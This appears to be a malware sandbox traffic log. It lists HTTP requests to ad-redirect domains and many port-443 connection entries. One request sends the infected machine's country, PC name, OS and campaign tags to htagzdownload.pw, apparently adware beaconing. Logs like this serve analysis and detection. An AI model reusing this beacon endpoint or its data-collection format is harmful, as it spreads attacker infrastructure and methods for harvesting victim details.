Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.5357586367230445&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252CwjKWoiZvoGU3BZ9GH0dEdHP3xP.5ac%252CtTPBIp8UNBXK7MDXTgz64xvdZ0u6aZ3TKc34Zz5N2qtMsjqES0bSmllnITSGq1EOZoFnXFIi5xUaKU_px33-bQHJxnCGSWtRYRqEtz7p8oiZRMbxQGIolIwDtRV81wyO7u1ngrI9yCLrOUwcVjQeU4bDvxEpjpAIJjxDAAp2Ai1U90zsNxFTwb--LTg5OmpzwmkiDjCR3Vn2v35SMu3wmzDrJK_5ZeoIu-DBXVXzL4EM6p0xsGzfd_8ZZ5OngKlcIHryXXS8j4LJksyOgtXhpmXPb5535EIKDaV7WHlTJseja-qaSXjg1BLvjBli8yi6bPvorf8Tvy6DeIKEJkZ5Ze2NsFbCSDGzpmSD9KQZiF-4U9mw3xw6uEIuPsgt2FDLDw88324J5R6EIcTmgvuFNFFlUxCik4xdpvFTWGjJY7p1-bB8XXb2--la7wZtf_EpvlhuQyO5CQ1YZieBfaLlmQ%252C%252C HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1343178 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /?clickid=Uts05EylDxyIUKiWAaW7RzRhUkG3H5wBgxwYxU0&cm_mmc=aff-_-ir-_-1310690-_-77416&ref=imprad1310690&afn_sr=impact HTTP/1.1Host: www.abebooks.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.12477552690685689&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252Cg3Z3d2a7oGU3Bv-GH0dEdHP3xP.3d3%252C9glu00p7OCSVcw7tiBE7G_X6_vJMkAgrSaSc9qMgw16cBpDefRb5oQr9kiBFuuP8BPUH2mxOZrKj410lIWL160ZP9QgZcmYNBDj_adXeShFhVxtDDWcTGwhgkxgg1sQhXHFj5yjJL1nelmJ2RT-FY_PnDru5fDFDdR2kKRzRlA-ZVtjNy5f0TSwW24hfufp5VneromdrOTcCro4yOTDzPHn7WkKIBFOrtF3sKYAN-q6jepgfBB95TkcTBeiw6-hM5laJ4OtyZLpUwc3Nq8WDYM9OIXAbrPVAAkByIDSNhqiowfd3yCAh81q--BD8eIPDPlmT9-ZinfIe0sXGj5CtQIxKkTu2YDq6iW1jzR-fuIclU5GZuVq4bE7aIwCd4z4fzaKKyb_qvMw-G4bLCpaHO_4Im2c0EDGuWRYpvrr4-bK3hshvclafesccSEKuKm-3Jka-xpS7fjGp-nrNDyGnOA-fAmPbvXQ1fOQVzVY41blaLs1bUIDzvaKPhR4HvGXg HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22Acrons%22,%22ip%22:%22%22,%22country%22:%22CH%22,%22DateTime%22:%222022/01/14%2018:01%22,%22Device%22:%22835180%22,%22PCName%22:%22user%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lyla7_lylach7_irecord_goodchannel_registry_goodchannel_AdxpertMedia_Acrons%22,%22Os%22:%22WIN10%22,%22Browser%22:%22Chrome%22%7D HTTP/1.1Host: htagzdownload.pwConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50738
Source: unknown	Network traffic detected: HTTP traffic on port 50726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50730
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 50578 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50745
Source: unknown	Network traffic detected: HTTP traffic on port 50853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50747
Source: unknown	Network traffic detected: HTTP traffic on port 50440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50740
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50741
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50600 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 50738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50758
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50464 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50752
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 50439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50768
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50762
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50761
Source: unknown	Network traffic detected: HTTP traffic on port 50337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50612 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50763
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50510 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 50783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50591 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 50656 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50704
Source: unknown	Network traffic detected: HTTP traffic on port 50931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50705
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50407 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50708
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50717
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50716
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50719
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50718
Source: unknown	Network traffic detected: HTTP traffic on port 50808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50496 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 50865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 50771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50727
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 50369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50644 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50337
Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50339
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50338
Source: unknown	Network traffic detected: HTTP traffic on port 50546 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50333
